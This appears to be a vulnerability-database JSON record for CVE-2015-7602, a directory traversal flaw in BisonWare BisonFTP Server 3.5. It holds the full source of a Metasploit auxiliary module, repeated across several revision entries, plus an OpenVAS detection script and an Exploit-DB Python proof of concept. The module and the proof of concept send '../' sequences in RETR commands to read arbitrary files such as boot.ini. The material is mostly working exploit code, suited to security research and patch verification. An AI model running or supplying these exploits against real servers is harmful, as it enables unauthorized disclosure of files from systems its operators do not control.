[], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-03-22T03:07:29"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2019-03-22T03:07:29", "differentElements": ["modified", "published"], "edition": 47}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "16708d46df6270c8caa416b93d03724c", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-03-28T11:30:40", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-03-28T11:30:40"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2019-03-28T11:30:40", "differentElements": ["modified", "published"], "edition": 48}], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-03-28T13:30:55"}, "vulnersScore": 5.0}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"]}
{"cve": [{"lastseen": "2016-09-03T23:17:13", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in BisonWare BisonFTP 3.5 allows remote attackers to read arbitrary files via a ../ (dot dot slash) in a RETR command.", "modified": "2015-10-13T12:52:11", "published": "2015-09-29T15:59:10", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7602", "id": "CVE-2015-7602", "title": "CVE-2015-7602", "type": "cve", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "openvas": [{"lastseen": "2019-02-07T18:29:40", "bulletinFamily": "scanner", "description": "This host is running BisonWare BisonFTP Server\n and is prone to directory traversal vulnerability.", "modified": "2019-02-07T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310805753", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805753", "title": "BisonWare BisonFTP Server Directory Traversal Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bisonware_bisonftp_server_dir_trav_vuln.nasl 13517 2019-02-07 07:51:12Z mmartin $\n#\n# BisonWare BisonFTP Server Directory Traversal Vulnerability\n#\n# Authors:\n# Deependra Bapna <bdeependra@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:bisonware:bison_ftp_server\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805753\");\n script_version(\"$Revision: 13517 $\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-07 08:51:12 +0100 (Thu, 07 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 12:41:58 +0530 (Tue, 29 Sep 2015)\");\n script_cve_id(\"CVE-2015-7602\");\n script_name(\"BisonWare BisonFTP Server Directory Traversal Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is running BisonWare BisonFTP Server\n and is prone to directory traversal vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send the crafted directory traversal attack\n request and check whether it is able to read the system file or not.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to error in handling of\n file names. It does not properly sanitise filenames containing directory traversal\n sequences that are received from an FTP server.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to read arbitrary files on the affected application.\");\n\n script_tag(name:\"affected\", value:\"BisonWare BisonFTP Server version 3.5.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability.\n Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the\n product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/38341\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"FTP\");\n script_dependencies(\"gb_bisonware_bisonftp_server_detect.nasl\");\n script_mandatory_keys(\"BisonWare/Ftp/Installed\");\n script_require_ports(\"Services/ftp\", 21);\n exit(0);\n}\n\ninclude(\"ftp_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nftpPort = get_app_port(cpe:CPE);\nif(!ftpPort){\n exit(0);\n}\n\nsoc = open_sock_tcp(ftpPort);\nif(!soc){\n exit(0);\n}\n\nkb_creds = ftp_get_kb_creds();\nuser = kb_creds[\"login\"];\npass = kb_creds[\"pass\"];\n\nlogin_details = ftp_log_in(socket:soc, user:user, pass:pass);\nif(!login_details)\n{\n close(soc);\n exit(0);\n}\n\nftpPort2 = ftp_get_pasv_port(socket:soc);\nif(!ftpPort2)\n{\n close(soc);\n exit(0);\n}\n\nsoc2 = open_sock_tcp(ftpPort2, transport:get_port_transport(ftpPort));\nif(!soc2)\n{\n close(soc);\n exit(0);\n}\n\nfiles = traversal_files( \"Windows\" );\n\nforeach pattern( keys( files ) ) {\n\n file = files[pattern];\n file = \"../../../\" + file;\n req = string(\"RETR \", file);\n send(socket:soc, data:string(req, \"\\r\\n\"));\n\n res = ftp_recv_data(socket:soc2);\n\n if( res && match = egrep( string:res, pattern:\"(\" + pattern + \"|\\WINDOWS)\", icase:TRUE ) ) {\n report = \"Used request: \" + req + '\\n';\n report += \"Received data: \" + match;\n security_message(port:ftpPort, data:report);\n close(soc2);\n close(soc);\n exit(0);\n }\n}\n\nclose(soc);\nclose(soc2);", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-04T07:52:44", "bulletinFamily": "exploit", "description": "BisonWare BisonFTP Server 3.5 - Directory Traversal Vulnerability. CVE-2015-7602. Remote exploit for windows platform", "modified": "2015-09-28T00:00:00", "published": "2015-09-28T00:00:00", "id": "EDB-ID:38341", "href": "https://www.exploit-db.com/exploits/38341/", "type": "exploitdb", "title": "BisonWare BisonFTP Server 3.5 - Directory Traversal Vulnerability", "sourceData": "#!/usr/bin/python\r\n# title: BisonWare BisonFTP server product V3.5 Directory Traversal Vulnerability\r\n# author: Jay Turla <@shipcod3>\r\n# tested on Windows XP Service Pack 3 - English\r\n# software link: https://www.exploit-db.com/apps/081331edfc143738a60e029192b5986e-BisonFTPServer.rar\r\n# description: BisonWare BisonFTP server product V3.5 is vulnerable to Directory Traversal (quick and dirty code just for PoC) \r\n\r\nfrom ftplib import FTP\r\n\r\nftp = FTP(raw_input(\"Target IP: \")) \r\nftp.login() \r\nftp.retrbinary('RETR ../../../boot.ini', open('boot.ini.txt', 'wb').write)\r\nftp.close()\r\nfile = open('boot.ini.txt', 'r')\r\nprint \"[**] Printing what's inside boot.ini\\n\"\r\nprint \"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\"\r\nprint file.read()\r\nprint \"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\"\r\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/38341/"}]}
